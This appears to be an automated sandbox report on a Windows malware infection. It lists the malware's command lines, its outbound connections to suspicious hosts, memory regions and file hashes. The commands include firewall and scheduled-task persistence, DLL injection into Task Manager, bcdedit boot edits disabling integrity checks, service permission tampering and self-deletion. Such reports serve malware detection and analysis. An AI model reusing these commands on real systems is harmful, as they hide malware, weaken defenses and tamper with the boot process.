netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe

"C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\u25w.0.exe

"C:\Users\Admin\AppData\Local\Temp\u25w.0.exe"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\u25w.1.exe

"C:\Users\Admin\AppData\Local\Temp\u25w.1.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe"

C:\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe

"C:\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe

"C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 piramidglobaltobacco.id udp
US 8.8.8.8:53 shipofdestiny.com udp
US 8.8.8.8:53 sty.ink udp
US 8.8.8.8:53 operandotwo.com udp
US 8.8.8.8:53 sty.ink udp
US 8.8.8.8:53 shipofdestiny.com udp
US 8.8.8.8:53 namemail.org udp
DE 185.172.128.144:80 185.172.128.144 tcp
AT 5.42.64.17:80 5.42.64.17 tcp
US 8.8.8.8:53 cu82342.tw1.ru udp
US 8.8.8.8:53 net.geo.opera.com udp
US 172.67.152.98:443 shipofdestiny.com tcp
SG 217.21.73.190:443 piramidglobaltobacco.id tcp
US 172.67.200.219:443 sty.ink tcp
US 172.67.160.247:443 operandotwo.com tcp
US 172.67.200.219:443 sty.ink tcp
US 104.21.32.142:443 shipofdestiny.com tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
RU 176.57.210.144:443 cu82342.tw1.ru tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 lawyerbuyer.org udp
GB 95.101.143.19:80 apps.identrust.com tcp
US 104.21.63.71:443 lawyerbuyer.org tcp
US 172.67.170.65:443 lawyerbuyer.org tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 guseman.org udp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
DE 185.172.128.65:80 185.172.128.65 tcp
DE 185.172.128.65:80 185.172.128.65 tcp
US 8.8.8.8:53 c75ba9a9-c55e-4795-8cdd-8591da95d806.uuid.statsexplorer.org udp
DE 185.172.128.144:80 185.172.128.144 tcp
DE 185.172.128.209:80 185.172.128.209 tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.50:80 download.iolo.net tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
SG 217.21.73.190:443 piramidglobaltobacco.id tcp
US 8.8.8.8:53 www.microsoft.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.65:80 185.172.128.65 tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 8.8.8.8:53 stun2.l.google.com udp
US 8.8.8.8:53 server15.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.108:443 server15.statsexplorer.org tcp
NL 74.125.128.127:19302 stun2.l.google.com udp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.108:443 server15.statsexplorer.org tcp

Files

memory/2236-0-0x0000000000050000-0x000000000005E000-memory.dmp

memory/2236-1-0x000007FEF64E0000-0x000007FEF6ECC000-memory.dmp

memory/2236-2-0x00000000002C0000-0x0000000000340000-memory.dmp

memory/2236-3-0x0000000000170000-0x000000000017A000-memory.dmp

memory/2236-4-0x0000000000190000-0x000000000019A000-memory.dmp

memory/2236-5-0x000000001AB20000-0x000000001AB9E000-memory.dmp

memory/2236-6-0x000000001B310000-0x000000001B38E000-memory.dmp

memory/2236-7-0x0000000001EB0000-0x0000000001ECC000-memory.dmp

memory/2236-8-0x0000000001EF0000-0x0000000001F0C000-memory.dmp

memory/2236-9-0x0000000001EB0000-0x0000000001EC4000-memory.dmp

memory/2236-10-0x0000000001F10000-0x0000000001F24000-memory.dmp

memory/2236-11-0x0000000001EB0000-0x0000000001EC0000-memory.dmp

memory/2236-12-0x0000000001EC0000-0x0000000001ED0000-memory.dmp

memory/2236-13-0x0000000001EB0000-0x0000000001EC8000-memory.dmp

memory/2236-14-0x00000000020C0000-0x00000000020D8000-memory.dmp

memory/2236-15-0x000000001B9D0000-0x000000001BB2A000-memory.dmp

memory/2236-16-0x000000001BB30000-0x000000001BC8A000-memory.dmp

memory/2236-17-0x000000001AB20000-0x000000001ABC4000-memory.dmp

memory/2236-18-0x000000001B7B0000-0x000000001B854000-memory.dmp

memory/2236-19-0x0000000001EB0000-0x0000000001ECA000-memory.dmp

memory/2236-20-0x00000000020E0000-0x00000000020FA000-memory.dmp

memory/2236-21-0x000000001B9D0000-0x000000001BAF2000-memory.dmp

memory/2236-22-0x000000001BC90000-0x000000001BDB2000-memory.dmp

memory/2236-23-0x000000001AB20000-0x000000001AB64000-memory.dmp

memory/2236-24-0x000000001AB70000-0x000000001ABB4000-memory.dmp

memory/2236-25-0x000000001AB70000-0x000000001ABE6000-memory.dmp

memory/2236-26-0x000000001B310000-0x000000001B386000-memory.dmp

memory/2236-27-0x0000000001ED0000-0x0000000001EE0000-memory.dmp

memory/2236-28-0x00000000020E0000-0x00000000020F0000-memory.dmp

memory/2236-29-0x000000001A680000-0x000000001A6B0000-memory.dmp

memory/2236-30-0x000000001AB70000-0x000000001ABA0000-memory.dmp

memory/2236-31-0x000000001B9D0000-0x000000001BA8A000-memory.dmp

memory/2236-32-0x000000001BDC0000-0x000000001BE7A000-memory.dmp

memory/2236-33-0x000000001AB70000-0x000000001ABD0000-memory.dmp

memory/2236-34-0x000000001B310000-0x000000001B370000-memory.dmp

memory/2236-35-0x000000001A680000-0x000000001A6A2000-memory.dmp

memory/2236-36-0x000000001AB70000-0x000000001AB92000-memory.dmp

memory/2236-37-0x000000001BE80000-0x000000001C245000-memory.dmp

memory/2236-38-0x000000001E310000-0x000000001E6D5000-memory.dmp

memory/2236-40-0x000000001A730000-0x000000001A74E000-memory.dmp

memory/2236-39-0x000000001A680000-0x000000001A69E000-memory.dmp

memory/2236-41-0x000000001B9D0000-0x000000001BA4C000-memory.dmp

memory/2236-42-0x000000001BA50000-0x000000001BACC000-memory.dmp

memory/2236-43-0x000000001BE80000-0x000000001BF1C000-memory.dmp

memory/2236-44-0x000000001BF20000-0x000000001BFBC000-memory.dmp

memory/2236-45-0x00000000020F0000-0x00000000020F8000-memory.dmp

memory/2236-46-0x0000000002180000-0x0000000002188000-memory.dmp

memory/2236-47-0x00000000020F0000-0x00000000020FE000-memory.dmp

memory/2236-48-0x0000000002180000-0x000000000218E000-memory.dmp

memory/2236-49-0x00000000020F0000-0x00000000020F8000-memory.dmp

memory/2236-50-0x000000001A680000-0x000000001A688000-memory.dmp

memory/2236-51-0x000000001ABA0000-0x000000001ABC2000-memory.dmp

memory/2236-52-0x000000001B2B0000-0x000000001B2D2000-memory.dmp

memory/2236-53-0x000000001A690000-0x000000001A6AA000-memory.dmp

memory/2236-54-0x000000001ABA0000-0x000000001ABBA000-memory.dmp

memory/2236-55-0x000000001A690000-0x000000001A6A2000-memory.dmp

memory/2236-56-0x000000001ABC0000-0x000000001ABD2000-memory.dmp

memory/2236-57-0x000000001A690000-0x000000001A6B0000-memory.dmp

memory/2236-58-0x000000001ABC0000-0x000000001ABE0000-memory.dmp

memory/2236-59-0x000000001BE80000-0x000000001BF30000-memory.dmp

memory/2236-60-0x000000001BF30000-0x000000001BFE0000-memory.dmp

memory/2236-61-0x000000001BE80000-0x000000001BFF6000-memory.dmp

memory/2236-62-0x000000001C000000-0x000000001C176000-memory.dmp

memory/2236-63-0x000000001B860000-0x000000001B882000-memory.dmp

memory/2616-465-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-467-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-469-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-471-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-473-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2616-474-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-477-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-480-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\TarBC44.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe

MD5 8bc396803bf0c509173078f354cb293b
SHA1 8a8e2298863cf6d5b5ad1c1f1efdb4f372f1cfa0
SHA256 e79bb6f916ff4f4bcca0dd2bb4c16233090265c38f3aeaa4a19bb125138773bb
SHA512 da3e916fb3b662584e3f1c8e5e6ac3c75c2f8aba0113597257cae5e9515944055e59d242efd08155939ea7044c7bf15a242f8d950e0a4a996889cbad1e20cd83

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1c38721b3c88cae46ff360a9cae1c252
SHA1 456a9ea611bd198b99b75368eb87a47a6d965f2a
SHA256 c57f28924010286694a6dd6ffa7da2aeb71838e4f5f6eac80623f6969e0f8574
SHA512 d04775ccfb6bbf62b4f81c2066048635523bef0b6d18bb4affb8088e34a86bf0baafda6347429634d3fbd7462bad05a5cc4d030eda086e210cb69e28ba8ce6d5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7e3d26d0c12841c73abeaac75d8d0dd
SHA1 59f837d364a00122cb874266f503162e7cdae161
SHA256 8bebbb03d232690315a6914ee28b18634bfb2d0ffc1b1240e6b629ff7a37afca
SHA512 2d6b20505d879204ba502575504467736a70bc2306013444204408c382fc6ec8f6ce7adc5dd3935b4c2eb0944caba1d2dd20bcf2fab038b4784e80c0a8a0065b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c25e18712a5c1abef5e7c9d22aaed862
SHA1 3e19fd0321393494298b1cc7e2346f1b2648b7ce
SHA256 f394cb699ac4251014d83029032abe84dfb7859725efd2744841f8f71e1f37c8
SHA512 5d6f3e4600b9745f248fcdfed4d6341b57d4cca499abb96ab47d20cf78f89c86c997d377541b0e97eb07cd7471e297faf05f049ffa73a23eb4c635c70f3a225c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f7d0172fd53c7e84752b814b793bca8d
SHA1 5cd578c188c8caad0224f480880c48697876a8aa
SHA256 8eaa8489902abad0d90ecf8e68d0bdab76bd38482fb18f4a2b5ded15266d653b
SHA512 a2488c4c5b7ecc3e8117841525f0d71932f5e4468daf231fba243ed0e8ba3015bd08ed4c5c528b6210f9be680da44fc1f0bff474c52e2683b6f97ce2ebe788d9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B2043001D270792DFFD725518EAFE2C

MD5 65db0ef6c7c4fe524343673178a87eac
SHA1 ca01af95c377a27dc16bf9b9fa4078c73e1f1927
SHA256 64a17ac375693b9a3e6ffa6ff2e3b25ce37f3a68ef6a49139dd8fa8a0640090a
SHA512 bab608383c9421c681fe809df78754947926f5b7f14e4b080b743814c6e79822a1df4ded26b45dd67215eb61268258e441235e82570aefcbd215ad3133755520

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6B2043001D270792DFFD725518EAFE2C

MD5 f55da450a5fb287e1e0f0dcc965756ca
SHA1 7e04de896a3e666d00e687d33ffad93be83d349e
SHA256 31ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0
SHA512 19bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 490b90690a05bbb314761583224e5715
SHA1 96007425171471943f7f83e433b27a121c6f3633
SHA256 961453a873c000d37ebc39219c12fd8e8868a5b451f152b1fe6b55bf62ce8b4d
SHA512 d429561064f0285dedbb12df781dbe072986fcc75d4b44f620f598c0c6ec1d662370a9f793343b809cbd187e2144fa4fa615b768f797ea255a1b6783b1c3b1f5

C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe

MD5 80fbcd8bcab6ddca53a467dfc54b2123
SHA1 5394a3de0dc598eeba66870d9070f54e8b137ede
SHA256 fff7af7e094a0f3d5e5b87eebbb5290e3d7570e192426e81909278abf8d0350b
SHA512 d7d14f7465da79ac9bfb1d88431e397e5f13fe7339f819b8e0404110bd73d10224d20c2b68178da3b7504de17c0b475f97ade83ab93d842310cf3baa605ac42c

memory/2828-780-0x0000000002810000-0x0000000002C08000-memory.dmp

memory/2596-792-0x00000000027D0000-0x0000000002BC8000-memory.dmp

memory/1524-804-0x0000000002660000-0x0000000002A58000-memory.dmp

memory/2764-805-0x0000000002860000-0x0000000002C58000-memory.dmp

memory/2596-807-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2828-806-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 55a23b43f7cd8868b13f6a4c57515f7e
SHA1 40336911fae7c0fd02003600d542024ab9c77413
SHA256 c6261cf654c880ea967d3b39fe5c5487a840d192640380f65cca7dc97d264e54
SHA512 728b31a2f34b7f2adf261620e56eb8dd7245f96013d561dc09ded376fe0ffd303f14af9aa2754db8dca21cb3a7a9d26689fde419818700c0fcb83a73562eef44

memory/2764-923-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/1760-924-0x0000000002710000-0x0000000002B08000-memory.dmp

memory/2804-935-0x0000000000400000-0x0000000000B0E000-memory.dmp

C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe

MD5 e2a6c1f58b137874e490b8d94382fcdb
SHA1 71529c5d708091b1e1a580227dc52e62a140edd1
SHA256 4801879a7afb9d03f7edcbe76cd9306cb024d80abc8512c4995aa97e8fd52437
SHA512 24d12ce668e5189a4ba80520a4eaf480d17d3a07d8d0d4312964968f8489143df225881ec70e39e0c62e381061626801ead72d70cea164e2c3870bfbd7bc4eff

memory/1388-951-0x0000000000400000-0x0000000000B06000-memory.dmp

memory/1524-955-0x0000000000400000-0x0000000000ECD000-memory.dmp

\Users\Admin\AppData\Local\Temp\u25w.0.exe

MD5 a533c58be371236669106ab5243b05bb
SHA1 59e8eae350fd911b9d74940fd5a0793f6b4fddc0
SHA256 6f746358af1862e923dee83621f64d56b2e8d8f8936e71d4d6bc565e97e58b09
SHA512 83970ca812ebef5e7c7a4e32c6b6a48d0028f688241441fedfa00e9171592bbc6fa883f0bc7f2603d31f687b1510633bca5468b3ecb96481aa62451c85885f8d

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 468767fbc7f5c338c42142704826433a
SHA1 a6f1254afb90efe113719f402dbcfdc9bff7df3a
SHA256 a686cd27948944db1b37daa7fd2e6a0548cc309e8ffc9f3208a61877f64e2275
SHA512 d068daadf1e02798c92e901129394b26d4df48e4d43adfd930cbe954e8f412ed82bbdfbea611caeb8479de6507ae4b6f61d4e91e707bf210681d2f23556cea97

memory/2888-1020-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2804-1049-0x0000000000400000-0x0000000000B0E000-memory.dmp

memory/1760-1050-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2888-1057-0x0000000000400000-0x0000000000AEA000-memory.dmp

\Users\Admin\AppData\Local\Temp\u25w.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/2804-1075-0x0000000000400000-0x0000000000B0E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 29a469d0e67af4bec3840e86f46fd544
SHA1 18db114f40305d5f8293aeea485725a4b6efdb82
SHA256 014127e8b8bb6f624633cea726a1f4a3a9f68103f268887fee3517146e617cff
SHA512 6470aa3c045571bc8fde755cdc87e0cf9a2f4446f80d3fac3c9fb3affa7b23745f6ff61fe9ef54ee43d26e136311fb6202ec8d5a4c6183a31a238376e95bdb96

memory/1760-1101-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2888-1103-0x0000000000400000-0x0000000000AEA000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 a97b5bc24fe8d5fdd5bb3a8a7b792a96
SHA1 7c0ae8eb28396e9e16af21fc92b40aa7286ced83
SHA256 ad514051449bc1b20b86737a021541f5c86d6948d4c148b510dbfc4593061b32
SHA512 0a7ca421237e1b2c2289b3f3f49ea38163bbb678343984697c8a658814358c9d22669af0d6a0b70991c55d1aada71effdbc424e68547e667579d5de9aef66fc1

memory/1760-1131-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/1344-1134-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1344-1139-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2888-1142-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1760-1176-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2888-1186-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1760-1202-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 30497be1982f98a944dbc258b2c88970
SHA1 a196485d9e670d139434dc177c83343897871b3b
SHA256 4360dcb5d99353ef02f3115e4cffb2792dc96c04e805e94007291d1d64ff342d
SHA512 683a4e4899d68a15daa047eb7a21055b4ce838bcfe9c8a0f67db7bf6f068346082f4659b36ff996578c381e1164924e65a8677c129257c1709e1be38150d42de

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\81950f7e7cbd108086cf2da3a401afdfffc60d9b485aac5dd52f7a137c00f950\8f255cc5927e43afad97dd565bbe4e7c.tmp

MD5 8a0c5aeb8c295ef788117672a933a18e
SHA1 2d2f335b1e2d26a6fc5d02fa3f7a7c8954db2cb2
